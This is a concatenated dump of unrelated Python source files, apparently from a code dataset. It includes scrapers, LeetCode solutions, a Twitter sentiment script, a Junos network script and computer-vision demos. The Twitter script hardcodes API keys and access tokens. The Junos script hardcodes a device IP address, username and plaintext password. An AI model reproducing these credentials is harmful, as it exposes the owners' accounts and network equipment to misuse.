',info,re.S)).replace(' ','')\n item['score'] = response.css('.ll.rating_num::text').extract_first().replace(' ','')\n item['number'] = response.css('.rating_people span::text').extract_first()\n yield item\n\n","sub_path":"douban_slave/douban_slave/spiders/slave.py","file_name":"slave.py","file_ext":"py","file_size_in_byte":2977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"553202693","text":"\"\"\"\n@author: nermin.bibic\n\"\"\"\n\nimport sys\nimport re\n\nimport pandas as pd\nimport numpy as np\n\ndef empty_to_nan(value):\n if value == '' or value is None:\n value = np.nan\n return value\n\ndef hasNumbers(text):\n return bool(re.search(r'\\d', text))\n\ndef representsInt(s):\n try: \n int(s)\n return True\n except ValueError:\n return False\n\ndef name_from_email(email):\n email = str(email)\n first_name = last_name = ''\n\n if '@' in email:\n email_name = email.split('@')[0]\n if email_name.count('.') == 1 and '_' not in email_name:\n first_name = email_name.split('.')[0]\n last_name = email_name.split('.')[1]\n elif email_name.count('.') == 2 and '_' not in email_name:\n first_name = email_name.split('.')[0]\n last_name = email_name.split('.')[2]\n elif email_name.count('_') == 1 and '.' not in email_name:\n first_name = email_name.split('_')[0]\n last_name = email_name.split('_')[1]\n elif email_name.count('_') == 2 and '.' not in email_name:\n first_name = email_name.split('_')[0]\n last_name = email_name.split('_')[2]\n if len(first_name) < 2 or len(last_name) < 2 or hasNumbers(first_name) or hasNumbers(last_name):\n first_name = ''\n last_name = ''\n\n first_name = first_name.title()\n last_name = last_name.title()\n return first_name, last_name\n\ndef name_from_facebook(facebook):\n facebook = str(facebook)\n\n if 'facebook.com/' in facebook:\n facebook_name = facebook.split('.com/')[1]\n if facebook_name.count('.') == 1:\n first_name = facebook_name.split('.')[0]\n last_name = facebook_name.split('.')[1]\n elif facebook_name.count('.') == 2 and representsInt(facebook_name.split('.')[2]):\n first_name = facebook_name.split('.')[0]\n last_name = facebook_name.split('.')[1]\n elif facebook_name.count('.') == 3 and representsInt(facebook_name.split('.')[3]) and len(facebook_name.split('.')[1])==1:\n first_name = facebook_name.split('.')[0]\n last_name = facebook_name.split('.')[2]\n if len(first_name) < 2 or len(last_name) < 2 or hasNumbers(first_name) or hasNumbers(last_name):\n first_name = ''\n last_name = ''\n \n first_name = first_name.title()\n last_name = last_name.title()\n return first_name, last_name\n\ndef name_from_linkedin(linkedin):\n linkedin = str(linkedin)\n first_name = last_name = ''\n\n if 'linkedin.com/in/' in linkedin:\n linkedin_name = linkedin.split('linkedin.com/in/')[1]\n if '/' in linkedin_name:\n linkedin_name = linkedin_name.split('/')[0]\n elif 'linkedin.com/pub/' in linkedin:\n linkedin_name = linkedin.split('linkedin.com/pub/')[1]\n if '/' in linkedin_name:\n linkedin_name = linkedin_name.split('/')[0]\n if 'linkedin_name' in locals():\n if linkedin_name.count('-') == 1:\n first_name = linkedin_name.split('-')[0]\n last_name = linkedin_name.split('-')[1]\n elif linkedin_name.count('-') == 2 and representsInt(linkedin_name.split('-')[2]):\n first_name = linkedin_name.split('-')[0]\n last_name = linkedin_name.split('-')[1]\n elif linkedin_name.count('-') == 2 and not representsInt(linkedin_name.split('-')[2]):\n first_name = linkedin_name.split('-')[0]\n last_name = linkedin_name.split('-')[2]\n 
if len(first_name) < 2 or len(last_name) < 2 or hasNumbers(first_name) or hasNumbers(last_name):\n first_name = ''\n last_name = ''\n\n first_name = first_name.title()\n last_name = last_name.title()\n return first_name, last_name\n\ndef find_names(inputFile):\n data = pd.read_csv(inputFile, low_memory=False, encoding='iso-8859-1')\n data = data.fillna('')\n\n for i, row in data.iterrows():\n first_name = str(row['person-name-first'])\n last_name = str(row['person-name-last'])\n\n if first_name == '':\n\n first_name, last_name = name_from_email(row['person-communication-email_addresses'])\n\n if first_name == last_name == '':\n first_name, last_name = name_from_facebook(row['person-communication-facebook-url'])\n\n if first_name == last_name == '':\n first_name, last_name = name_from_linkedin(row['person-communication-linkedin-url'])\n \n if first_name != '' and last_name != '':\n data.set_value(i, 'person-name-first', first_name)\n data.set_value(i, 'person-name-last', last_name)\n data.set_value(i, 'person-name-full', first_name + \" \" + last_name)\n\n data.to_csv(inputFile.split(\".csv\")[0] + \"_added_names.csv\", index=False)\n\nfind_names(sys.argv[1])\n\n\n\n","sub_path":"Projects/data_manipulation/extract_names.py","file_name":"extract_names.py","file_ext":"py","file_size_in_byte":4869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"329025035","text":"from webalchemy import remotedocument\n\nclass menu:\n def __init__(self,rdoc,on_add=None):\n self.rdoc= rdoc\n self.element= rdoc.element('nav')\n\n vn= 'nav.'+self.element.varname\n self.stylesheet= self.rdoc.stylesheet()\n self.rule_nav= self.stylesheet.rule(vn)\n self.rule_navli= self.stylesheet.rule(vn+' li')\n self.rule_navlihover= self.stylesheet.rule(vn+' li:hover')\n self.on_add= on_add\n\n def add_item(self,*varargs):\n for text in varargs:\n i= self.rdoc.element('li',text)\n if self.on_add:\n self.on_add(i,text)\n self.element.append(i)\n\n","sub_path":"webalchemy/widgets/basic/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"633266090","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the makeAnagram function below.\ndef makeAnagram(a, b):\n count = 0\n alphabet = [0] * 26\n for i in list(a):\n alphabet[ord(i) - 97] += 1\n for j in list(b):\n alphabet[ord(j) - 97] -= 1\n \n for i in range(len(alphabet)):\n count += abs(alphabet[i])\n return count\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n a = input()\n\n b = input()\n\n res = makeAnagram(a, b)\n\n fptr.write(str(res) + '\\n')\n\n fptr.close()\n","sub_path":"Completed Code/MakeAnagram.py","file_name":"MakeAnagram.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"385037100","text":"Test_labels = []\nf = open('Test_labels.txt',\"r\")\nfor line in f:\n\tl = line.strip()\n\tTest_labels.append(l)\n\nPredicted_labels = []\nf = open('predicted_labels..txt',\"r\")\nfor line in f:\n\tl = line.strip()\n\tPredicted_labels.append(l)\n\nf1 = open('sarcastic_predictions.txt',\"w\")\nf2 = open('non_sarcastic_predictions.txt',\"w\")\nfor i in range(len(Test_labels)):\n\tif Test_labels[i] == 
'nonsarcasm':\n\t\tf2.write(Predicted_labels[i])\n\t\tf2.write('\\n')\n\telse:\n\t\tf1.write(Predicted_labels[i])\n\t\tf1.write('\\n')\n\nf1.close()\nf2.close()\n\n","sub_path":"Systems/Numerical Sarcasm Detection/Machine Learning Experiments/KNN/exp_on_sentiment_punctuation_number/case_study.py","file_name":"case_study.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"194397047","text":"# 穷举所有的子区间,对每个子区间进行求和\n# O(n^3) 子区间划分方法1:固定终点,起点从左往右走\n\n# 优化—有相同的前缀:sum[1,4]=sum[1,3]+nums[4]\n# O(n^2) 子区间划分方法2:固定起点,终点从起点往右走\n\nclass Solution:\n def maxSubArray(self, nums: List[int]) -> int:\n length=len(nums)\n res=-2147483647\n # 子区间划分方法1\n # for i in range(length):\n # for j in range(i+1):\n # s=sum(nums,j,i)\n # res=max(res,s)\n\n # 子区间划分方法2\n for i in range(length):\n s=0\n for j in range(i,length):\n s+=nums[j]\n res=max(res,s)\n return res\n\n\n\n def sum(self,nums: List[int],left:int,right:int) ->int:\n res=0\n for i in range(left,right+1):\n res+=nums[i]\n return res\n","sub_path":"53.最大子序和/暴力【提示超时错误】.py","file_name":"暴力【提示超时错误】.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"203712847","text":"class Solution:\n \"\"\"\n @param nums: an integer array\n @param low: An integer\n @param high: An integer\n @return: nothing\n \"\"\"\n\n def partition2(self, nums, low, high):\n # write your code here\n if not nums or len(nums) < 2:\n return\n\n l, r = 0, len(nums) - 1\n i = 0\n while i <= r:\n if nums[i] < low:\n nums[l], nums[i] = nums[i], nums[l]\n l += 1\n i += 1\n elif nums[i] > high:\n nums[r], nums[i] = nums[i], nums[r]\n r -= 1\n else:\n i += 1","sub_path":"625_Partition Array II.py","file_name":"625_Partition Array II.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"630506742","text":"# import the necessary packages\nimport numpy as np\nimport argparse\nimport cv2\nimport sys\nimport time\n \n# construct the argument parse and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-v\", \"--video\", help = \"path to the image\")\nargs = vars(ap.parse_args())\n \n# load the image\n# video = cv2.imread(args[\"video\"])\n\n# define the list of boundaries\nboundaries = [\n ([0,130,70], [20,255,230]),\n ([160,120,70], [180,255,255])\n \n\n\n #([17, 15, 100], [50, 56, 200]),\n #([86, 31, 4], [220, 88, 50]),\n #([25, 146, 190], [62, 174, 250]),\n #([103, 86, 65], [145, 133, 128])\n]\n\npressed = True\ndef mouse(event, x, y, flags, params):\n global pressed\n if event == cv2.EVENT_LBUTTONDOWN:\n pressed = True\n print(\"Left click %d,%d\" % (x,y))\n\n\nif __name__ == '__main__' :\n \n\n # Read video\n video = cv2.VideoCapture(args[\"video\"])#\"trimmed2_540p.mp4\")\n cv2.namedWindow(\"FrameAlfred\")\n cv2.setMouseCallback(\"FrameAlfred\", mouse)\n\n # Exit if video not opened.\n if not video.isOpened():\n print(\"Could not open video\")\n sys.exit()\n \n # Read first frame.\n ok, frame = video.read()\n if not ok:\n print('Cannot read video file')\n sys.exit()\n \n while True:\n # Read a new frame\n if (pressed == True):\n pressed = False\n for i in range(2):\n ok, frame = video.read()\n #frame = cv2.cvtColor(frame,cv2.COLOR_BGR2HSV) # Convert to HSV\n frame = cv2.resize(frame,(960,540))\n\n if not ok:\n break\n \n # Start timer\n timer = cv2.getTickCount()\n \n # Update tracker\n #ok, 
bbox = tracker.update(frame)\n \n # Calculate Frames per second (FPS)\n fps = 20;#cv2.getTickFrequency() / (cv2.getTickCount() - timer);\n \n # Draw bounding box\n if ok:\n pass\n # Tracking success\n #p1 = (int(bbox[0]), int(bbox[1]))\n #p2 = (int(bbox[0] + bbox[2]), int(bbox[1] + bbox[3]))\n #cv2.rectangle(frame, p1, p2, (255,0,0), 2, 1)\n else :\n # Tracking failure\n cv2.putText(frame, \"Tracking failure detected\", (100,80), cv2.FONT_HERSHEY_SIMPLEX, 0.75,(0,0,255),2)\n \n\n\n\n\n\n # # loop over the boundaries\n # for (lower, upper) in boundaries:\n # # create NumPy arrays from the boundaries\n # lower = np.array(lower, dtype = \"uint8\")\n # upper = np.array(upper, dtype = \"uint8\")\n \n # # find the colors within the specified boundaries and apply\n # # the mask\n # mask = cv2.inRange(frame, lower, upper)\n # output = cv2.bitwise_and(frame, frame, mask = mask)\n\n # # convert the image to grayscale\n # gray_image = cv2.cvtColor(output, cv2.COLOR_BGR2GRAY)\n # ret,thresh = cv2.threshold(gray_image,0,255,0)\n # #output = thresh\n # #output = gray_image\n\n\n\n # # Motion tracking method 1\n # contours, hierarchy = cv2.findContours(thresh,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\n # for c in contours:\n # # calculate moments for each contour\n # M = cv2.moments(c)\n \n # # calculate x,y coordinate of center\n # if M[\"m00\"] != 0:\n # cX = int(M[\"m10\"] / M[\"m00\"])\n # cY = int(M[\"m01\"] / M[\"m00\"])\n # cv2.circle(output, (cX, cY), 5, (255, 0, 0), -1)\n # else:\n # cX, cY = 0, 0\n \n\n \n # Display result\n output = frame\n cv2.imshow(\"FrameAlfred\", output)\n #np.hstack([frame, output]))\n #time.sleep(0.2)\n # Exit if ESC pressed\n k = cv2.waitKey(1) & 0xff\n if k == 27 : break\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"color-parser/bball_tracker.py","file_name":"bball_tracker.py","file_ext":"py","file_size_in_byte":3753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"580748056","text":"from django.contrib import admin\nfrom django.urls import path\nfrom . 
import views\napp_name = \"article\"\n\nurlpatterns = [\n\n path('article/', views.detail, name=\"detail\"),\n path('', views.articles, name=\"articles\"),\n path('comment/', views.addComment, name=\"comment\"),\n path('update/', views.updateArticle, name=\"update\"),\n path('delete/', views.deleteArticle, name=\"delete\"),\n path('like/', views.like_post_article, name=\"like_post\"),\n path('favourite_post/', views.favourite_post, name=\"favourite_post\"),\n path('favourite_list/', views.favourite_list, name=\"favourite_list\"),\n path('science/', views.category_science, name=\"category_science\"),\n path('culture/', views.category_culture, name=\"category_culture\"),\n path('technology/', views.category_technology, name=\"category_technology\"),\n path('art/', views.category_art, name=\"category_art\"),\n path('sport/', views.category_sport, name=\"category_sport\"),\n path('editordashboard/', views.dashboard, name=\"dashboard\"),\n path('addarticle/', views.addArticle, name=\"addArticle\"),\n\n]\n","sub_path":"article/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"220466697","text":"from dbcon import *\nimport numpy as np\nimport cv2\nimport csv\nface_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\ncap = cv2.VideoCapture(0)\nrec = cv2.face_LBPHFaceRecognizer.create();\nrec.read(\"trainingdata.yml\")\npeople=list()\nid=0\nfont = cv2.FONT_HERSHEY_SIMPLEX\ndef liveVideo():\n while 1:\n ret, img = cap.read()\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray, 1.5, 5)\n for (x,y,w,h) in faces:\n cv2.rectangle(img,(x,y),(x+w,y+h),(255,0,0),2)\n id,conf=rec.predict(gray[y:y+h,x:x+w])\n #print(id)\n id=con(\"SELECT username FROM studentinfp WHERE id=%s\" %id)\n if id is None:\n id=\"Unknown\"\n cv2.putText(img,str(id),(x,y+h),font,2.0,(0,0, 255))\n if(id not in set(people)):\n attandace(id)\n people.append(id)\n cv2.imshow('img',img)\n if cv2.waitKey(1) == ord('q'):\n break\n cap.release()\n cv2.destroyAllWindows()\n#liveVideo()","sub_path":"faceDETECTOR.py","file_name":"faceDETECTOR.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"430035463","text":"from distutils.core import setup\nfrom setuptools import find_packages\n\nPACKAGE = \"weixunsdkfrs\"\nNAME = \"WeixunSDKFrs\"\nDESCRIPTION = \"WeixunSDKFrs\"\nAUTHOR = \"Maple Liu\"\nAUTHOR_EMAIL = \"maple.liu@microfastup.com\"\nURL = \"http://github.com/weixunsdkfrs\"\nVERSION = __import__(PACKAGE).__version__\n\nsetup(\n name=NAME,\n version=VERSION,\n description=DESCRIPTION,\n # long_description=read(\"README.md\"), \n author=AUTHOR,\n author_email=AUTHOR_EMAIL,\n license=\"Apache License, Version 2.0\",\n url=URL,\n packages=find_packages(),\n classifiers=[\n \"Development Status :: 3 - Alpha\",\n \"Environment :: Web Environment\",\n \"Intended Audience :: Developers\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python\",\n ],\n) ","sub_path":"pypi_install_script/WeixunSDKFrs-0.1.20170213.1819.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"148667645","text":"import tweepy\nfrom textblob import TextBlob\nimport pandas as pd\nfrom IPython.display import display\n\n# Step 1 - 
Authenticate\nconsumer_key= 'dNltCHVvGCMe1tbOsd0uVyDzM'\nconsumer_secret= '6DDT94jq42cgokvXLYuvjOvUXtFLLG9OzDCPr40TmY5XkXy6C1'\n\naccess_token='2826897272-M9jhGCfKo3zjvZaya2XSnYzU9cLmbkHMrPJZMI1'\naccess_token_secret='E7PxcT8jriMkHBwE92kz5uzYYtMZQ84Yf3UnFd6EWjrH1'\n\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_token_secret)\n\napi = tweepy.API(auth)\n\n#Step 3 - Retrieve Tweets\npublic_tweets = api.search('$amzn')\n# public_tweets = api.user_timeline(screen_name = 'realDonaldTrump', count = 200, include_rts = False)\n\npolarities = []\ntweets = []\nanalysis_results = []\n\nfor tweet in public_tweets:\n print(\"\")\n # print(tweet.text)\n print(\"\")\n #Step 4 Perform Sentiment Analysis on Tweets\n analysis = TextBlob(tweet.text)\n polarity = analysis.polarity\n polarities.append(polarity)\n # print(polarity)\n print(\"\")\n if polarity > .15:\n # print(\"positive\")\n sentiment = \"positive\"\n elif polarity < -.1:\n # print(\"negative\")\n sentiment = \"negative\"\n else:\n # print(\"neutral\")\n sentiment = \"neutral\"\n print(\"\")\n analysis_results.append((tweet.text, polarity, sentiment))\n # analysis_results.append(analysis_result)\n\n\nap = average_polarity = sum(polarities) / len(polarities)\nif(ap <= -.15):\n polarity_description = \"negative\"\nelif(ap > -.15 and ap <= 0):\n polarity_description = \"fairly negative\"\nelif(ap > 0 and ap <= 0.15):\n polarity_description = \"fairly positive\"\nelse:\n polarity_description = \"positive\"\nprint(\"The average polarity (sentiment) is \" + str(round(average_polarity,2)) + \", which is \" + polarity_description)\n\n\n\n\ndf = pd.DataFrame(analysis_results, columns= ['Tweet', 'Polarity', 'Sentiment'])\n# df.to_csv('/Users/ryanwhetstone/GoogleDrive/Python/test.csv',index=False)\n\ndisplay(df.head(10))","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"71090954","text":"__author__ = 'zhangxa'\nimport os\n\nfrom tornado import gen\nimport yaml\n\nfrom OpenSpider.concurrents.coroutine.runner import Runner\nfrom OpenSpider.resource.manager import ResourceManager\n\nclass WorkflowEngine(Runner):\n def __init__(self,workflows,**settings):\n self._workflows = workflows\n self._settings = settings\n\n '''\n We must define coroutine here,because every component in workflow should execute one by one.\n So the component class also should implement its execute method in a coroutine\n '''\n @gen.coroutine\n def run(self):\n input = None\n for component in self._workflows:\n lst = component.split('.')\n settings = {}\n cfg_file = os.path.join(lst[0],'cfg','httpworkflow',lst[-1]+'.yaml')\n if os.path.exists(cfg_file):\n with open(cfg_file,'r') as fin:\n settings = yaml.load(fin)\n cls_comp = ResourceManager.getResource(component)\n obj_comp = cls_comp(input,**settings)\n input = yield obj_comp.execute()\n\n def executeElements(self,workflow):\n for comp in workflow:\n comp.execute()","sub_path":"OpenSpider-master/workflow/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"224882328","text":"import pygame\nfrom pygame.sprite import Group\nfrom stats import Stats\nimport game_functions as gf\nfrom mario import Mario\nfrom settings import Settings\nfrom level import Level\nfrom pipe import Pipe\nfrom display import Display\nfrom map 
import Map\nfrom flag import Flag\nfrom pole import Pole\n\n\ndef run_game():\n pygame.init()\n settings = Settings()\n screen = pygame.display.set_mode((settings.screen_width, settings.screen_height))\n pygame.display.set_caption(\"Mario\")\n\n # Groups for sprites\n pipes = Group()\n secret_pipes = Group()\n bricks = Group()\n secret_bricks = Group()\n upgrades = Group()\n enemies = Group()\n poles = Group()\n flags = Group()\n\n stats = Stats()\n # Stores pipes for secret level in secret_pipes group\n for i in range(6, 8):\n pipe = Pipe(screen, settings, i)\n secret_pipes.add(pipe)\n\n # Create and initialize flag and pole before storing in group\n flag = Flag(screen, settings, stats)\n flags.add(flag)\n pole = Pole(screen, settings)\n poles.add(pole)\n\n mario = Mario(screen, settings, pipes, bricks, upgrades, stats, enemies, poles, secret_bricks, secret_pipes)\n lvl_map = None\n level = Level(screen, settings, pipes, bricks, upgrades, enemies, flags, poles)\n display = Display(screen, stats)\n\n while True:\n # Checks if Mario is in the main level and sets the map, generate the bricks, pipes, flags, and pole\n # Does this only once\n if stats.activate_main_lvl:\n lvl_map = Map(screen, settings, bricks, pipes, mario, enemies, upgrades, stats, secret_bricks)\n lvl_map.build_brick()\n # generate pipes and flag/pole\n for i in range(0, 6):\n pipe = Pipe(screen, settings, i)\n pipes.add(pipe)\n flag = Flag(screen, settings, stats)\n flags.add(flag)\n pole = Pole(screen, settings)\n poles.add(pole)\n stats.activate_main_lvl = False\n\n # Checks if Mario has activated the secret level and sets the map, clears all of the main level\n # Does this only once\n if stats.activate_secret:\n # Clears everything belonging to main level to prevent lag\n pipes.empty()\n bricks.empty()\n enemies.empty()\n poles.empty()\n flags.empty()\n lvl_map = Map(screen, settings, bricks, pipes, mario, enemies, upgrades, stats, secret_bricks)\n lvl_map.build_brick()\n\n stats.activate_secret = False\n stats.main_level = False\n\n if stats.game_active:\n gf.check_events(mario, stats)\n\n # If the player gets near the right side, shift the world left (-x)\n if mario.rect.right >= 600 and stats.main_level:\n diff = mario.rect.right - 600\n mario.rect.right = 600\n level.shifting_world(-diff)\n\n gf.update_screen(screen, mario, settings, level, pipes, display, stats, lvl_map, bricks, upgrades, enemies,\n flags, poles, secret_bricks, secret_pipes)\n pygame.display.flip()\n\n\nrun_game()\n","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":3158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"346349383","text":"import constraint\n \n \nproblem = constraint.Problem()\n\n\nproblem.addVariables(\"TE\",range(1,10))\n\nproblem.addVariables(\"WOIGHLV\",range(10))\n\ndef o(t, e, w, o, i, g, h, l, v):\n\tif (t*100 + w*10 + o)*(t*100 + w*10 + o) + (e*10000 + i*1000 + g*100 + h*10 + t) == t*100000 + w*10000 + e*1000 + l*100 + v*10 + e:\n\t\treturn True\n\n\nproblem.addConstraint(o,\"TEWOIGHLV\")\n\nproblem.addConstraint(constraint.AllDifferentConstraint())\n\n\n\n\nresenja = problem.getSolutions()\n\nfor r in resenja:\n two = r['T']*100 + r['W']*10 + r['O']\n eight = r['E']*10000 + r['I']*1000 + r['G']*100 + r['H']*10 + r['T']\n twelve = r['T']*100000 + r['W']*10000 + r['E']*1000 + r['L']*100 + r['V']*10 + r['E']\n print( \"{0:d} * {1:d} + {2:d} = {3:d}\".format(two, two, eight, 
twelve))\n","sub_path":"ispiti/sabiranje.py","file_name":"sabiranje.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"21683161","text":"def is_palindrome(x):\n\ts = str(x)\n\tn = 1 if len(s) % 2 == 0 else 0\n\tif s[:int(len(s)/2)] == s[-1:int(len(s)/2)-n:-1]:\n\t\treturn True\n\telse:\n\t\treturn False\n \ndef problem4(n):\n return max(set([i*j for i in range(n) for j in range(n) if is_palindrome(i*j)]))\n \nif __name__ == '__main__':\n print(problem4(999))","sub_path":"problem4/problem4.py","file_name":"problem4.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"446851384","text":"from jnpr.junos import Device\nimport time\n\n\nstart_time = time.time()\n\nout=open(\"D:\\\\amr_ali\\python\\out.txt\",'w')\ndevices=\"D:\\\\amr_ali\\python\\devices.txt\"\nroutes=\"D:\\\\amr_ali\\python\\\\routes.txt\"\nwith open(routes,'r') as f:\n routes=f.readlines()\n routes=[x.strip() for x in routes]\n\nprint (routes)\n\nwith Device(host=\"10.212.0.26\", user=\"a.abdelwahab\", passwd=\"VGPxzbXV\", port=\"22\") as dev:\n for route in routes :\n data = dev.cli(\"show route \" + route + \" active-path detail table Mobile_Backhaul_2G_Central | find Protocol\")\n i = data.find(\"Protocol\")\n j = data.find(\"\\n\",i)\n\n # data1=dev.rpc.get_route_information(destination=route, detail=True, table='Mobile_Backhaul_2G_Central', active_path=True )\n\n out.write(data[i:j] + \" ->->\"+ route)\n out.write(\"\\n\")\n\n\n\n\nout.close()\n\n\nprint ( \"finished in %a sec.\" %(time.time()-start_time))\nprint (\" check data on following path \\\"D:\\\\amr ali\\python\\out.txt\\\"\")\n\n","sub_path":"scrept.py","file_name":"scrept.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"464864593","text":"list1 = [23, 79, 7, 8, 0, -2]\r\nlist2 = [3, 89, 88, 54, 13, 12]\r\n\r\noddList = []\r\nevenList = []\r\n\r\nfor num in list1:\r\n if(num%2!=0): oddList.append(num)\r\n\r\nfor num in list2:\r\n if(num%2==0): evenList.append(num)\r\n\r\nprint(f'First list : {list1}')\r\nprint(f'Odd list : {oddList}')\r\nprint(f'Second list : {list2}')\r\nprint(f'Even list : {evenList}')","sub_path":"python/Activity9.py","file_name":"Activity9.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"474814136","text":"import json\nimport re\n\n\n\nANSWER_MARGIN=50\nMAX_SEQ_LEN=512\n\ndef process_context(line):\n line = line.replace(\"·\", \"\", 100)\n spans = re.split('([,。])', line)\n if len(spans) <= 2:\n spans = re.split('([,。])', line)\n if len(spans) <= 2:\n spans = re.split('([;;,。,])', line)\n assert len(spans) > 2, spans\n # spans = [span for span in spans if len(span)>1]\n spans_sep = []\n for i in range(len(spans)//2):\n spans_sep.append(spans[2*i]+spans[2*i+1])\n assert len(spans_sep) > 0, spans\n return [[spans_sep[0],spans_sep]]\n\ndef supporting_facts(answers, context_lines):\n res = []\n idx = set()\n answers = list(set(answers))\n for i in range(len(context_lines)):\n for answer in answers:\n if context_lines[i].find(answer) != -1:\n if i not in idx:\n res.append([context_lines[0], i])\n idx.add(i)\n return res\n\n\n\n\nfor type in ['big_train_data','dev_ground_truth','test_ground_truth']:\n with open('2019_'+type+'.json', 'w', encoding='utf8') as 
fw:\n fin = open(type+'.json', 'r', encoding='utf8')\n line = fin.readline()\n dic = json.loads(line)\n results = []\n _id = 0\n for item in dic['data']:\n id = item['caseid']\n domain = item['domain']\n para = item['paragraphs'][0]\n context = para['context']\n casename = para['casename']\n qas = para['qas']\n for qa in qas:\n question = qa['question']\n qid = qa['id']\n is_unknown = qa['is_impossible']\n answers = qa['answers']\n\n ans_starts = [ans['answer_start'] for ans in answers]\n if len(ans_starts) > 0:\n answer_pos = min(ans_starts)\n else:\n answer_pos = 0\n\n if len(context)>MAX_SEQ_LEN:\n answer_start = min(answer_pos-ANSWER_MARGIN, len(context)-MAX_SEQ_LEN)\n answer_start = max(answer_start,0)\n answer_end = min(answer_start+MAX_SEQ_LEN, len(context))\n else:\n answer_start = 0\n answer_end = len(context)\n\n conv_dic = {}\n conv_dic['_id'] = _id\n conv_dic['context'] = process_context(context[answer_start:answer_end])\n conv_dic['question'] = question\n conv_dic['supporting_facts'] = []\n if is_unknown == \"true\":\n conv_dic['answer'] = \"unknown\"\n else:\n if answers[0]['text'] in [\"YES\",\"NO\"]:\n conv_dic['answer'] = answers[0]['text'].lower()\n else:\n conv_dic['answer'] = answers[0]['text']\n ans_spans = [answer['text'] for answer in answers]\n conv_dic['supporting_facts'] = supporting_facts(ans_spans, conv_dic['context'][0][1])\n results.append(conv_dic)\n _id+= 1\n fin.close()\n fw.write(json.dumps(results, ensure_ascii=False, indent=4))\nprint('FIN')","sub_path":"CAIL2020/ydljz(hong)/19dataset_convert.py","file_name":"19dataset_convert.py","file_ext":"py","file_size_in_byte":3195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"62574581","text":"import pickle\nfrom keras_frcnn.config import Config\n\n\ndef start():\n c=Config()\n with open('config_default_resnet.pickle', 'wb') as f:\n pickle.dump(c,f, protocol=pickle.HIGHEST_PROTOCOL)\n\n\n\nif __name__ == '__main__':\n start()\n","sub_path":"frcnn/create_config_pickle.py","file_name":"create_config_pickle.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"103633730","text":"import numpy\nimport cv2\nimport random\nm = cv2.imread('messi.jpg', 0) \n# will show the image in a window \nx,y=m.shape\nprint(x,y)\nt=numpy.transpose(m)\nm,n=t.shape\nprint(m,n)\n#print(t)\nasc=[]\ns='HELLO'\nfor i in s:\n asc.append(ord(i))\nprint(\"ASCII code of secret key is \",asc)\npos=[]\nfor a in asc:\n c=0\n loc=[]\n for i in range(m):\n for j in range(n):\n c=c+1\n if(a==t[i][j]):\n loc.append(c)\n pos.append(random.choice(loc))\n print(a,'is found ',len(loc),' times')\nprint(\"Final Position is \",pos)\np=[]\nfor a in pos:\n c=0\n #loc=[]\n for i in range(m):\n for j in range(n):\n c=c+1\n if(a==c):\n p.append(chr(t[i][j]))\nprint(\"Final Plain Text is\",''.join(p))\n \n \n \n","sub_path":"Image Encryption/ImageKey.py","file_name":"ImageKey.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"33994755","text":"## Problem3 (https://leetcode.com/problems/search-a-2d-matrix-ii/)\n#Time Complexity : O(m+n), m=number of rows and n=number of columns\n# Space Complexity : O(1) \n# Did this code successfully run on Leetcode : Yes\n# Any problem you faced while coding this : No\n\nclass Solution:\n def searchMatrix(self, 